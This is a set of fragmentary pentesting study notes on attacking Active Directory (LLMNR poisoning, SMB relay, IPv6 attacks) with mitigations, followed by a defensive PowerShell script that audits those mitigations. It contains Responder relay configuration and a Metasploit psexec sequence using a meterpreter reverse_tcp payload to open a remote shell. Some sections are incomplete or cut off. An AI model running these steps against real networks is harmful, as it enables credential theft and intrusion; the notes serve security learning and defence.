An overview of the initial attack vectors that can be used to compromise Active Directory environments. It covers techniques such as LLMNR poisoning, SMB relay attacks, and IPv6-based attacks, and lists the requirements, steps, and mitigation strategies for each attack vector. It also discusses how to gain shell access using tools like Metasploit and psexec. The document serves as a guide for security professionals and penetration testers to understand and defend against these initial attack vectors targeting Active Directory infrastructure.
Typology: Essays (high school)
LLMNR (Link-Local Multicast Name Resolution) is used to identify hosts when DNS fails; previously this role was filled by NBT-NS.
Key flaw: when a host answers an LLMNR request appropriately, the requesting service sends the username and NTLMv2 hash (and we can intercept that).
Requirements :
Instead of cracking hashes gathered with Responder, we can relay those hashes to specific machines and gain access.
Requirements :
  - someone must log in to or access our \10.0.2.
  - SMB signing must be disabled on the target (or not enforced)
  - the relayed user's creds must be admin on the machine (local admin on their machine)
Steps:
  1. Discover hosts with SMB signing disabled:
       nmap --script=smb2-security-mode.nse -p445 192.168.57.0/24 -Pn
       # we need to note down machines with 'message signing enabled but not required'
  2. vim targets.txt   # add target IPs
  3. Edit the Responder config - turn SMB and HTTP off, because we need to make sure these captures are relayed rather than answered by Responder itself:
       vim /etc/responder/Responder.conf   # turn SMB, HTTP off
       SMB = Off
       HTTP = Off
Mitigation :
  - Enable SMB signing on all devices
      pro: completely stops the attack
      con: can cause performance issues with file copies
  - Disable NTLM authentication on the network
      pro: completely stops the attack
      con: if Kerberos stops working, Windows defaults back to NTLM
  - Account tiering
      limit domain admins to specific tasks
  - Local admin restriction to prevent lateral movement
      con: potential increase in the amount of service desk tickets
  a. we can log in with a domain account (pparker)
  b. or we can log in to a local account with an NTLM hash
  # this step has to be done once we have the credentials
  msfconsole
  search psexec
  use exploit/windows/smb/psexec
  options   # set all required options, such as RHOSTS, smbdomain, smbpass and smbuser
  set payload windows/x64/meterpreter/reverse_tcp
  show options
  set LHOST eth
  # try multiple options if these tools do not work (blocked), such as smbexec and wmiexec
  ls lootme   # contains useful info
  # if we keep the program running in the background and a user logs in, the creds can be captured
Mitigation :
  - Block DHCPv6 traffic and incoming router advertisements.
  - Disable WPAD via Group Policy.
  - Enable both LDAP signing and LDAP channel binding.
  - Mark admin users as Protected Users or sensitive accounts.
Pass-Back attacks can be used for printer hacking.
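As an added example (not part of these notes), a read-only PowerShell audit of the mitigations listed for SMB relay above and for the IPv6 attack here, meant to be run in an elevated session on the host being checked. It assumes the `WinHttpAutoProxySvc` service state is an acceptable stand-in for the WPAD Group Policy setting, and the LDAP checks only run where the NTDS registry key exists (a domain controller).

```powershell
# Added example, not from the original notes: report whether the listed mitigations
# are in place on this host. Read-only; enforce the settings through Group Policy.

function Get-RegistryDword {
    param([string]$Path, [string]$Name)
    try { (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name }
    catch { $null }   # key or value absent -> setting not configured
}

function Test-RelayMitigations {
    $results = @()

    # LLMNR poisoning: multicast name resolution disabled by policy (EnableMulticast = 0)
    $llmnr = Get-RegistryDword 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient' 'EnableMulticast'
    $results += [pscustomobject]@{ Control = 'LLMNR disabled'; Ok = ($llmnr -eq 0); Value = $llmnr }

    # SMB relay: signing must be *required*, not merely enabled, on both server and client side
    $srv = Get-SmbServerConfiguration
    $cli = Get-SmbClientConfiguration
    $results += [pscustomobject]@{ Control = 'SMB server signing required'; Ok = $srv.RequireSecuritySignature; Value = $srv.RequireSecuritySignature }
    $results += [pscustomobject]@{ Control = 'SMB client signing required'; Ok = $cli.RequireSecuritySignature; Value = $cli.RequireSecuritySignature }

    # IPv6 / LDAP relay (domain controllers only):
    #   LDAPServerIntegrity 2 = require signing, LdapEnforceChannelBinding 2 = always enforce
    $ntds = 'HKLM:\SYSTEM\CurrentControlSet\Services\NTDS\Parameters'
    if (Test-Path $ntds) {
        $sign = Get-RegistryDword $ntds 'LDAPServerIntegrity'
        $cb   = Get-RegistryDword $ntds 'LdapEnforceChannelBinding'
        $results += [pscustomobject]@{ Control = 'LDAP signing required'; Ok = ($sign -eq 2); Value = $sign }
        $results += [pscustomobject]@{ Control = 'LDAP channel binding enforced'; Ok = ($cb -eq 2); Value = $cb }
    }

    # WPAD: the WinHTTP auto-proxy discovery service should be disabled (assumption: used
    # here as a proxy for the Group Policy setting the notes recommend)
    $wpad = Get-Service -Name WinHttpAutoProxySvc -ErrorAction SilentlyContinue
    $results += [pscustomobject]@{ Control = 'WPAD service disabled'; Ok = ($null -eq $wpad -or $wpad.StartType -eq 'Disabled'); Value = $wpad.StartType }

    $results
}

Test-RelayMitigations | Format-Table -AutoSize
```

Any row with Ok = False corresponds to one of the mitigations above still missing on that host.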